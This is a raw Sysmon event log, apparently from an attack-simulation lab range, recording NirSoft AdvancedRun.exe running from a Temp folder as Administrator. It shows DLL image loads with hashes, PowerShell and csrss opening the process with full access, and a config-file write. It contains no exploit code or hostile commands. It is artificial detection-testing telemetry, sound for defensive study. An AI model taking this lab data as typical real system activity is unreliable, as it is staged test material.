16:53:55.224{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912143Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.224{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912142Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.224{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912141Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.224{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912140Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.208{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912139Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.208{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912138Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.208{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912137Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.208{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912136Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.208{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912135Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.208{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912134Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.208{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912133Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.208{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912132Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.208{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912131Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.208{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912130Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.208{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912129Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.208{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912128Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.208{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912127Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.208{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912126Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.208{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912125Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.208{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912124Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.208{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912123Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.208{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912122Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.208{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912121Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.208{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912120Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.208{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912119Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.208{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000003912118Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.208{834264DD-DAF8-61EA-5B00-000000002702}41005552C:\Windows\system32\csrss.exe{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003912117Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.208{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003912116Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.210{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{00000000-0000-0000-0000-000000000000}944--- 534500x80000000000000003911193Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:32.370{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 11241100x80000000000000003911192Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:32.354{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg2022-01-21 16:52:32.354ATTACKRANGE\Administrator 10341000x80000000000000003911174Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:30.266{834264DD-DB11-61EA-9500-000000002702}4285304C:\Windows\Explorer.EXE{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003911173Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:30.266{834264DD-DB11-61EA-9500-000000002702}4285304C:\Windows\Explorer.EXE{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003911172Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:30.266{834264DD-DB11-61EA-9500-000000002702}4285304C:\Windows\Explorer.EXE{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003911171Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:30.266{834264DD-DB11-61EA-9500-000000002702}4285520C:\Windows\Explorer.EXE{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003911170Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:30.266{834264DD-DB11-61EA-9500-000000002702}4285520C:\Windows\Explorer.EXE{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003911169Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:30.266{834264DD-DB11-61EA-9500-000000002702}4285520C:\Windows\Explorer.EXE{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003911166Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 